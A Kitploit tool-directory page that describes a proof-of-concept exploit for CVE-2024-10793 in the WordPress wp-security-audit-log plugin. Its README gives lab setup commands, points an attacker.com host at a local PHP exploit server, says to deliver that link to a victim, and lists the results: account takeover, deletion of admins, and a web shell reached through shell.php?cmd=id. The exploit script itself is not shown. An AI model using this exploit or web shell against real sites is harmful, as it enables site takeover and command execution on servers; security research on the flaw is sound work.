Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-10793 — Proof-of-concept exploit for CVE-2024-10793 targeting WordPress wp-security-audit-log plugin. Demonstrates account takeover, privileged user creation, shell upload, and admin manipulation via crafted HTTP requests. | Kitploit
Tools/GitHubGitHub/mahajian/cve-2024-10793
Privilege EscalationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPayload Development
GitHubmahajian/cve-2024-10793

CVE-2024-10793

Proof-of-concept exploit for CVE-2024-10793 targeting WordPress wp-security-audit-log plugin. Demonstrates account takeover, privileged user creation, shell upload, and admin manipulation via crafted HTTP requests.

View Repository
2111 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-10793 PoC

Set this lines to your hosts file:

root@kitploit:~
127.0.0.1  goodcms.lab
127.0.0.1  attacker.com

Launch Wordpress using docker:

root@kitploit:~
$ sudo systemctl start docker
$ sudo docker-compose up -d

Open http://goodcms.lab:2121 and do installation wordpress steps. Install wp-security-audit-log.5.2.1 or older versions in wordpress.

Launch attacker server:

root@kitploit:~
$ php -S 0:9091 -t ./exploit

Deliver http://attacker.com to victim & Bingo!

Exploit Impacts:

  • Add privileged user.
  • Change current admin profile
  • Delete all admins except hacker :)
  • Shell Upload
  • Logout

alt text

Account Takeover & Create Privileged User Poc: Attacker credentials after exploit: { email: [email protected], username: amin, password: 123456 } (You can change from xpl.js code.)

Run Shell Command: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id

alt text

Download Tool